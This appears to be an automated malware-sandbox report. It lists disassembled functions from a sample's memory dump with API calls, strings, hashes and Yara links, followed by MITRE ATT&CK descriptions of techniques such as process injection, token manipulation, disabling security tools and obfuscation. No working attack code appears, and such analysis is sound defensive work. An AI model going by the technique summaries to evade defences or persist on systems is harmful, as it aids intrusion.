Opcode ID: 1a164ffb7d7992499a21f89b34fc0440501e870148e75efce5f3466bc3cc7b47
Instruction ID: 49e4c0660a23dcb75cd5f3498cc31a18c8345470ec49bbbe7571606633aa47d7
Opcode Fuzzy Hash: 1a164ffb7d7992499a21f89b34fc0440501e870148e75efce5f3466bc3cc7b47
Instruction Fuzzy Hash: BFF0A0B198420CEBDB10EFE0DD05BDE7B71FB14705F004159F904AA280DBB94A84DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00596BC4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0040F608: InitializeCriticalSectionEx.KERNEL32(0079E760,00000000,00000000,0079E74C,00596BF3,?,?,?,0040F21C), ref: 0040F60E
Part of subcall function 0040F608: GetLastError.KERNEL32(?,?,?,0040F21C), ref: 0040F618

IsDebuggerPresent.KERNEL32(?,?,?,0040F21C), ref: 00596BF7
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040F21C), ref: 00596C06

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00596C01

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 88da9bc2f899907a1d6627ffafd0da83b39259829df6f6793debda9842619c1e
Instruction ID: d4c036fcae37f4084c567cba2579976e98d4a324b05579e4f57c4f6623958f28
Opcode Fuzzy Hash: 88da9bc2f899907a1d6627ffafd0da83b39259829df6f6793debda9842619c1e
Instruction Fuzzy Hash: 16E06D702017818FDB709F25E5087827FE5AB14349F01892DF885D7651EBB5D988CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041236F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412374

Part of subcall function 00412559: __EH_prolog.LIBCMT ref: 0041255E

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

__CxxThrowException@8.LIBVCRUNTIME ref: 004123C2

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

86A, xrefs: 004123AE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: 86A
API String ID: 1193697898-1576963401
Opcode ID: f6fefb93a8016f4d5820b687e0725b4b40c18e82d00a83300a8d939c596b7758
Instruction ID: 0b62c954ae02e6c1c718dab4881d14592e3510e7da179f93061bc6e4a504c101
Opcode Fuzzy Hash: f6fefb93a8016f4d5820b687e0725b4b40c18e82d00a83300a8d939c596b7758
Instruction Fuzzy Hash: 91F01CB180528CEADB04EBE5C64E6CCBFB5AB10318F204168D0517B186C7B90B88C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA48, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CA4D

Part of subcall function 0041D8B4: std::exception::exception.LIBCMT ref: 0041D8D6

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CA9B

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

bA, xrefs: 0041CA79

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrowstd::exception::exception
String ID: bA
API String ID: 1371192639-897489536
Opcode ID: 2716bbbf81c842bf1b27c6300b8ecd3f3c6e2e1163b5b2925c245b324a45f4df
Instruction ID: 1702613bc4d7873dff79c591d96cd102a775604c8e5d15698f88d781f926d443
Opcode Fuzzy Hash: 2716bbbf81c842bf1b27c6300b8ecd3f3c6e2e1163b5b2925c245b324a45f4df
Instruction Fuzzy Hash: 00F01CB1C1425CEADF04FBA9D94AADCBBB4AF14318F14426CE06176192C7B91648CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAFA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CAFF

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CB4D

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

JA, xrefs: 0041CB2B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: JA
API String ID: 1193697898-3301965381
Opcode ID: 8bd85736b7c2cea6e92f45583433b4f34073cc927cf1b11944b1a8d4cd02a7cb
Instruction ID: 5228f20f21dc8152200ef69f30287661c6e84751c9a023f01c5366d53ad0930e
Opcode Fuzzy Hash: 8bd85736b7c2cea6e92f45583433b4f34073cc927cf1b11944b1a8d4cd02a7cb
Instruction Fuzzy Hash: 5EF0F8B2C1825CEBDF04EBA5C94A6DDBFB5AB14308F108268E05176182CBB90648CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC56, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CC5B

Part of subcall function 0040F569: std::exception::exception.LIBCMT ref: 0040F58B

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CCA9

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

KA, xrefs: 0041CC87

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrowstd::exception::exception
String ID: KA
API String ID: 1371192639-4189050869
Opcode ID: 4c1ea2af7b9039861cb6726c3c3c17fcbc05b0211f7b0f8da518d32bef9fb658
Instruction ID: 48157b314adcb158eb4ecfb938529cea034f0d970046aa0e08d466c5143675d8
Opcode Fuzzy Hash: 4c1ea2af7b9039861cb6726c3c3c17fcbc05b0211f7b0f8da518d32bef9fb658
Instruction Fuzzy Hash: 0FF0F8B1C1425CEADF14EFA5D94AACCBAB0AB14308F14426DE06176193C7B94648CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CD0D

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

__CxxThrowException@8.LIBVCRUNTIME ref: 0041CD5B

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

3A, xrefs: 0041CD39

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: 3A
API String ID: 1193697898-806190331
Opcode ID: 752e4bddf0348bb06a045d0cc595b55efbe3f8ae2b409c3dea51c142d1a9049a
Instruction ID: afcf0afa1086773f7d4efeaeebe32466338ed74be56a30067d14ed461a87e8a8
Opcode Fuzzy Hash: 752e4bddf0348bb06a045d0cc595b55efbe3f8ae2b409c3dea51c142d1a9049a
Instruction Fuzzy Hash: 0DF01CB1C1420CEBDF04EBA5DD4A6CCBEB5BF14318F10426CE06176192D7B9464CCB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041D648, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041D64D

Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4

__CxxThrowException@8.LIBVCRUNTIME ref: 0041D69B

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

Strings

RA, xrefs: 0041D679

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: RA
API String ID: 1193697898-2489262598
Opcode ID: ed25e96609f27017d1fbef0252baa919f2359df7f3a56548066db5bc896ddfdd
Instruction ID: f7f83b3d672e2e3ea372a55306b04b1c76932bacc795154e1acbce626890db18
Opcode Fuzzy Hash: ed25e96609f27017d1fbef0252baa919f2359df7f3a56548066db5bc896ddfdd
Instruction Fuzzy Hash: 31F01CB1C1425CEBDF04FFA5C94AADCBEB4AB24318F14426CE4517B192C7B90A48CB29

Uniqueness

Uniqueness Score: -1.00%

Function 004260D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004260D6
std::exception::exception.LIBCONCRT ref: 004260E7

Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313

Strings

call to empty boost::function, xrefs: 004260DF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog___std_exception_copystd::exception::exception
String ID: call to empty boost::function
API String ID: 238416039-3939084148
Opcode ID: b07cba072a029add528fb8cbd24f0446675fe96943eb8b5c453dc6219cff55b2
Instruction ID: 31dc3c1c376e461c466c09fd2016a5224f36de06e2c6f883abf66d0ff9b0a87f
Opcode Fuzzy Hash: b07cba072a029add528fb8cbd24f0446675fe96943eb8b5c453dc6219cff55b2
Instruction Fuzzy Hash: A9E0DFB0D51219EBE7249F88C8063DDBBF9EB04320F1002AEE490A32C2C3F91B018BC4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2E4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040A2EB

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040A2E5, 0040A2F2
1.38, xrefs: 0040A2F3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: df565420a293036e6b499453e7c4f81eaf856cb4d076cc90e17c9894c9dd32f3
Instruction ID: ddb6bf3122922fbe502811115ade512f7d7a5d7aa7b7724a637a58d77962b036
Opcode Fuzzy Hash: df565420a293036e6b499453e7c4f81eaf856cb4d076cc90e17c9894c9dd32f3
Instruction Fuzzy Hash: 0AC04C5299A5202D39493255380BDEE424F8D96320F16117FF540656D25D892D8155FE

Uniqueness

Uniqueness Score: -1.00%

Function 004022AB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004022B2

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 004022AC, 004022B1, 004022B9
1.38, xrefs: 004022BA

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: aac3953a22f41796b9c16187f17e44da99a082832c5482b622a2949e9966aeed
Instruction ID: 5077432d5b53f128c306b847c1f12a9bec3d7b103ef96dfda9e75c436612fc35
Opcode Fuzzy Hash: aac3953a22f41796b9c16187f17e44da99a082832c5482b622a2949e9966aeed
Instruction Fuzzy Hash: 7FC04C22A9A62029394972653C07DEA025E8D56720B16147FF940E55D25C992D8142FE

Uniqueness

Uniqueness Score: -1.00%

Function 00408733, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040873A

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 00408734, 00408739, 00408741
1.38, xrefs: 00408742

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: c504404120b04fb4b80ca1f5c653794ea014cec73a4e6f63e397829085c33a1b
Instruction ID: 077a2de6e530767f8f8a5263a5e530a8d9f8b299f56ac8d3a85c5ecfd48a5b9a
Opcode Fuzzy Hash: c504404120b04fb4b80ca1f5c653794ea014cec73a4e6f63e397829085c33a1b
Instruction Fuzzy Hash: 67C04C2259A6306D3D4933A5794BDEA024E8D57324B16107FF541A55D25C893C8151FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040497B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00404982

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040497C, 00404981, 00404989
1.38, xrefs: 0040498A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: e70d84a9a4634892d1e9a7c08f94d3cc4e285153d074398c0836d2e753225b11
Instruction ID: ce8c6b9130df83ab8c0afd1af596a027e8b0888e437793a1298583a6eb38ad6b
Opcode Fuzzy Hash: e70d84a9a4634892d1e9a7c08f94d3cc4e285153d074398c0836d2e753225b11
Instruction Fuzzy Hash: BCC04C1259A5202D398932953C17DEF024E8D57320B16206FBA40695D25C892D8141FF

Uniqueness

Uniqueness Score: -1.00%

Function 00402B76, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00402B7D

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 00402B77, 00402B7C, 00402B84
1.38, xrefs: 00402B85

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: bae72b9ae056f696bf9cca0c69fa4f2615d4f81e5374cc61c7cde92c7a88cc49
Instruction ID: 4f5c75626164dbfafd80348b99963ab7a9d84dd1f5d8ec61549205f2f7f59819
Opcode Fuzzy Hash: bae72b9ae056f696bf9cca0c69fa4f2615d4f81e5374cc61c7cde92c7a88cc49
Instruction Fuzzy Hash: 11C04C5299E5202D394932657817DEE124E8D57320B16117FFA40655D35C892D8182FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB1C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040CB23

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040CB2B
1.38, xrefs: 0040CB1D, 0040CB22, 0040CB2A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: d7ac500c0954ce5b82a284b90f30f48b2037601fa3af11a0ad7479b49875ea0c
Instruction ID: 531aef82cc003a45f3d6309ecc600574b307fd2a97c03e21a80bdfbb73218b3a
Opcode Fuzzy Hash: d7ac500c0954ce5b82a284b90f30f48b2037601fa3af11a0ad7479b49875ea0c
Instruction Fuzzy Hash: 10C04C6259E5202D3D4933953907DEA028E8D57330B16107FF641655D25D883D8141FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABAF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040ABB6

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040ABB0, 0040ABB5, 0040ABBD
1.38, xrefs: 0040ABBE

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: f74ea4fe565a14d054bd0f445a6778d2a26202918d2aa55b28a7814573f683fb
Instruction ID: fd8eaf1fce6ce899814d2ce77275db4dd5cac19f9901057d6998bcb7c5abf39e
Opcode Fuzzy Hash: f74ea4fe565a14d054bd0f445a6778d2a26202918d2aa55b28a7814573f683fb
Instruction Fuzzy Hash: 59C04C529DA5202D394933A53807DEE025E8D96320B16106FB540655D25D992C8181FE

Uniqueness

Uniqueness Score: -1.00%

Function 00408FFE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00409005

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 00408FFF, 00409004, 0040900C
1.38, xrefs: 0040900D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: d3c4ab94c6c3377464fe855da136e1dcb4c0e83da0938b18f0c1c1a8ed89191e
Instruction ID: fff324d0faf7d8b0d14dcd6155d2c71b54e2705f0ba7604b252d380fc4553fc4
Opcode Fuzzy Hash: d3c4ab94c6c3377464fe855da136e1dcb4c0e83da0938b18f0c1c1a8ed89191e
Instruction Fuzzy Hash: F8C04C125AE5206D394932653D07DEA024E8D56720B16106FF545655D65C893C8141FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040526D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00405274

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040526E, 00405273, 0040527B
1.38, xrefs: 0040527C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: f1b7c03adf4d4403b65cae781279b273ddaf3a30aec31156395cc6d58ee474c9
Instruction ID: e266af1bf60833dd135b2964f202bcab8b80facd9f0f7c2e15cfabd8b8876539
Opcode Fuzzy Hash: f1b7c03adf4d4403b65cae781279b273ddaf3a30aec31156395cc6d58ee474c9
Instruction Fuzzy Hash: C2C04C12D9A5202D394933A9380BDEA024E9D57360B16106FF540A55D25C892D8142FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3E7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040D3EE

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040D3E8, 0040D3ED, 0040D3F5
1.38, xrefs: 0040D3F6

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: 5df529b2e007cfa9edba6ece055679dc5d6a1557ca873d1e2ecda020089f495e
Instruction ID: 8d93459c49d6af7b25c8a4b4c202fd9f8707758037e8c628de551d446fba8bf7
Opcode Fuzzy Hash: 5df529b2e007cfa9edba6ece055679dc5d6a1557ca873d1e2ecda020089f495e
Instruction Fuzzy Hash: 59C04C125AA5212D3D4933A53807DEA024E8D97320B26107FB641A59D25C882D8141FF

Uniqueness

Uniqueness Score: -1.00%

Function 0040B47A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040B481

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 0040B47B, 0040B488
1.38, xrefs: 0040B489

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: 6b60881ce5dff7c4a8807e355f1f9caecb95f8ba3ebfaa88246cd050f82b921f
Instruction ID: 5b22846f854b49fb38c1f477b0dd8c63ec913540427ac75266d689f0d58e517d
Opcode Fuzzy Hash: 6b60881ce5dff7c4a8807e355f1f9caecb95f8ba3ebfaa88246cd050f82b921f
Instruction Fuzzy Hash: 1CC04C1299A5206D395933653817DEE024E8D96320B16107FF541A69D35D992C8141FE

Uniqueness

Uniqueness Score: -1.00%

Function 004034E9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004034F0

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 004034EA, 004034EF, 004034F7
1.38, xrefs: 004034F8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: f73f773d284885a5729a52a99a09a8592bee684cf4ca280d6cb3adcdf1aea056
Instruction ID: b1944bd9225a8aa413123696bc0613764c06176728732efb393501e9ef0666f4
Opcode Fuzzy Hash: f73f773d284885a5729a52a99a09a8592bee684cf4ca280d6cb3adcdf1aea056
Instruction Fuzzy Hash: 7CC04C1259A5206D394932553807DEA024E8D97320B16107FF6406A5D25C892C9142FE

Uniqueness

Uniqueness Score: -1.00%

Function 004018A5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004018AC

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 004018A6, 004018AB, 004018B3
1.38, xrefs: 004018B4

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: 1c5e405a2478787280821c4375825341ea903c890c1c86fbccdc62dcdcb46702
Instruction ID: dd26f7408a621207772bc125f8f53bc7781b5565fce5ce3598a79d70814a804d
Opcode Fuzzy Hash: 1c5e405a2478787280821c4375825341ea903c890c1c86fbccdc62dcdcb46702
Instruction Fuzzy Hash: 9FC08C5298A1202C384837643817DEE028E8C52320B02003FF500A15C21C882C8142FF

Uniqueness

Uniqueness Score: -1.00%

Function 00409A19, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00409A20

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

1.38, xrefs: 00409A1A, 00409A1F, 00409A27
1.38, xrefs: 00409A28

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.38$1.38
API String ID: 4000879885-3497077264
Opcode ID: 318a7dff1be7bcf5bcddb34293279abfa22f687f9da7856121f757d9db81d017
Instruction ID: b225cc8389eede286499cdf83a1b8471753445de4cac1218ef575fddac2c498f
Opcode Fuzzy Hash: 318a7dff1be7bcf5bcddb34293279abfa22f687f9da7856121f757d9db81d017
Instruction Fuzzy Hash: 13C04C1299A5212D395936557807DEE034E8D97320B56106FB644655D35D893C8141FE

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

